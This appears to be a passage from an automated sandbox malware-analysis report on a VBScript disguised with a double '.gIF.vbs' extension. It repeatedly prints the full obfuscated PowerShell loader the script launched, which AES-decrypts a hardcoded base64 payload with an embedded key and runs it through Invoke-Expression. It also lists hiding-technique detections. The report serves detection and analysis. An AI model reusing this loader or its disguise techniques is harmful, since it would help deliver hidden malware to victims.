        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.StdIn();IHost.StdErr();IHost.StdOut();IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.FullName();IWshShell3.Run("powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([Str", "0", "false")
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34658328 pushad ; retf 2_2_00007FFD34658329
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347203A0 push eax; iretd 2_2_00007FFD347203A1

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: Possible double extension: gif.vbsStatic PE information: creatednewwaterbottleforme.gIF.vbs
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
